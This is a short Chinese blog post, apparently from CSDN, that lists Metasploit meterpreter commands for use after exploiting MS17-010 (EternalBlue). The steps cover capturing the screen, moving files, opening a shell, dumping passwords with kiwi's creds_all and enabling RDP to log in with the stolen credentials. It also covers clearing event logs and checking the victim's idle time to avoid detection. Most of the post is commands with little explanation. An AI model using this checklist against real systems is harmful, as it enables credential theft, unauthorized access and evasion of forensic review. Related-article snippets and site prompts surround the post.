拿下ms17-010后的后续操作

已于 2023-08-17 17:32:08 修改
阅读量3.2k 收藏 1
点赞数 1
文章标签: 安全
于 2023-04-20 10:53:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_68647219/article/details/130261345
版权

1.捕获屏幕

meterpreter > screenshot

 2.上传/下载文件

meterpreter > upload hello.txt c://

 meterpreter > download d://1.txt

3. 远程桌面

meterpreter > run vnc

4.获得cmd

meterpreter > shell

 5.获取用户密码

meterpreter > load kiwi

Kiwi在32位系统中能够正常使用,到了64位系统中需要用到进程迁移

meterpreter > creds_all

 6.启用远程桌面,配合上一步获取到的密码。

meterpreter > run post/windows/manage/enable_rdp

使用时一般配合查看远程用户的空闲时长,空闲时间长再进行远程登陆,减小被发现的风险。登录rdp会把对方顶掉。

meterpreter > idletime

7.使用 rdesktop 命令远程连接桌面

root@kali:~# rdesktop 192.168.2.6

8.清除日志

meterpreter > clearev

朝阳挽歌
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
永恒之蓝漏洞复现(ms17-010)
good good study
01-20 2万+
Metasploit Framework(MSF)是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版中,改成了用Ruby语言编写的了。在kali中,自带了Metasploit工具。
MS17-010 漏洞利用+修复方法
qq_44484541的博客
04-07 2874
使用时一般配合查看远程用户的空闲时长,空闲时间再进行远程登陆,减小被发现的风险。可以发现,靶机上扫到4个漏洞,其中包括了ms17-010。开始攻击,出现meterpreter >表示运行成功。rhosts显示远程主机未配置,配置目标主机ip。开始扫描漏洞,确认靶机存在ms17-010漏洞。使用扫描模块确认是否存在ms17-010漏洞。6.启用远程桌面,配合上一步获取到的密码登陆。使用ms17-010攻击模块并设置攻击载荷。利用nmap漏洞脚本进行扫描。搜索ms17-010相关模块。nmap端口快速扫描。
使用msf(Metasploit Framework)检测MS17-010(永恒之蓝)
热门推荐
sanMu_blog的博客
07-02 1万+
今天是入职的第一天,还是有点忐忑,新地点新事物,希望自己的选择没有错,努力!废话不多说,入职后被安排的第一件事情,就是在Ubuntu环境下搭建msf(metasploit framework渗透框架),然后下午去渗透测试。个人习惯Windows系统,于是在VMware内安装Ubuntu,由于电脑有VMware,具体的安装就不说了,Ubuntu安装教程本人参考的是Ubuntu安装教程,msf教程是...
msf利用ms17-010永恒之蓝获取win7 shell并留后门
weixin_43102772的博客
02-15 4415
思路: 1.判断靶机是否存在ms17-010漏洞 2.攻击靶机获得shell 3.创建用户账号(知道原账号、密码则可省了,直接用原用户账号代替) 4.留后门 实验开始: 一:判断靶机是否存在ms17-010漏洞 sf5 > use exploit/windows/smb/ms17_010 二:攻击靶机获得shell 1.调用ns17-010永恒之蓝 2.设置payload 3.设置lho...
易语言拿下google--URL编码
08-20
《易语言拿下google--URL编码》是一篇关于利用易语言编程实现对Google URL进行编码的教程。在互联网编程中,URL编码(Uniform Resource Locator Encoding)是处理URL时必不可少的一个环节,因为URL中可能包含特殊...
易语言源码拿下google--URL编码.rar
02-16
在“易语言源码拿下google--URL编码.rar”这个压缩包中,包含的源码可能是一个易语言编写的程序,该程序涉及到的核心知识点是URL编码,这是一个在网络编程中常见的技术。 URL(统一资源定位符)是互联网上资源的...
拿下google--URL编码.zip易语言项目例子源码下载
03-22
拿下google--URL编码.zip易语言项目例子源码下载拿下google--URL编码.zip易语言项目例子源码下载 1.合个人学习技术项目参考 2.适合学生毕业设计参考 3.适合小团队开发项目参考
Animetronic - hackmyvm
tanbinn的博客
08-12 487
hackmyvm的Animetronic靶场
GPS叉车安全管理系统,远程监控管理车辆,保障叉车资产安全
jiuxindianzi的博客
08-16 341
九盾叉车监管系统利用GPS技术实现叉车全面监管,含IC卡指纹认证、无线实时测速、安全带报警器及小程序后台管理,提升安全性、效率及管理水平,降低运营成本。
H5直播行业的安全挑战:为何害怕黑客攻击?
@云安全小杜
08-13 444
随着移动互联网的快速发展,H5直播因其便捷性和互动性成为众多平台的选择。然而,这种开放性和交互性也带来了安全风险,使得H5直播行业成为了黑客攻击的目标之一。本文将探讨H5直播面临的常见威胁,并提供一些基本的防御措施。
企业如何组建安全稳定的跨国通信网络
TIANGEKUAJING的博客
08-13 265
当企业在海外设有分公司时,如何建立一个安全且稳定的跨国通信网络是一个关键问题。为了确保跨国通信的安全和稳定性,可以考虑以下几种方案。
如何选择较为安全的第三方依赖版本?
最新发布
极客星云-CSDN博客
08-16 60
本篇博文分享如何选择较为安全的第三方依赖版本的方法。
Scout Suite:开源云安全审计工具
网络研究观
08-12 355
Scout Suite 是一个开源、多云安全审计工具,旨在评估云环境的安全态势。
安全自动化和编排:如何使用自动化工具和编排技术来提高安全操作效率。(第二篇)
艰难的活着
08-13 1004
深入理解Kubernetes环境中的安全自动化与编排(第二篇)
Linux安全与高级应用(十二)深入探讨Linux系统中的YUM仓库服务与PXE网络装机
洛秋的博客
08-12 1173
YUM(Yellowdog Updater Modified)是基于RPM包管理的一种软件更新机制,它能够自动解决软件包之间的依赖关系,并且所有的软件包都来自集中的YUM仓库。YUM仓库是一种存储RPM包的集合,可以通过多种方式(如FTP、HTTP或本地目录)提供给客户机,客户机可以通过配置YUM仓库位置来获取和安装所需的软件包。YUM仓库服务与PXE网络装机是Linux系统管理中的两个关键技术,通过它们,管理员可以高效地管理软件包和进行大规模的系统部署。这不仅提高了工作效率,也增强了系统的稳定性和安全性。
文件上传-.htaccess利用
feiwujiushiwo的博客
08-13 418
限于Apache.htaccess文件是服务器中的一个配置文件,它负责相关目录下的网页配置。笼统地说,.htaccess可以帮我们实现包括:文件夹密码保护、用户自动重定向、自定义错误页面、改变你的文件扩展名、封禁特定IP地址的用户、只允许特定IP地址的用户、禁止目录列表,以及使用其他文件作为index文件等一些功能。
守护数字堡垒:全面掌握安全配置管理
2401_85761762的博客
08-13 631
安全配置管理是确保系统安全的重要环节。通过本文的详细介绍,读者应该对SCM有了全面的认识。实施有效的SCM策略,可以帮助组织降低安全风险,提高系统稳定性和合规性。通过本文,我们提供了一个全面的指南,帮助读者理解SCM的概念、重要性以及如何在实践中应用SCM。记住,持续的监控和改进是确保SCM成功的关键。
超网和无类间路由是什么?
m0_73609283的博客
08-14 951
CIDR允许更灵活的IP地址分配,减少了地址空间的浪费。例如,一个企业可能需要一个完整的B类地址空间(65536个地址),但又超过了C类地址空间(256个地址)在这种情况下,CIDR可以明确分配一个合理的地址范围(如1024个地址),从而避免地址的浪费。无类间路由(CIDR)是一种新的IP地址分配方法,取代了传统的基于类的分配方法。通过合并连续的子网,超网可以减少路由入侵的数量,从而提高网络的效率。总之,超网和无类间路由技术提高了IP地址的利用效率,还简化了路由表管理,支持网络的灵活扩展。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

朝阳挽歌

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值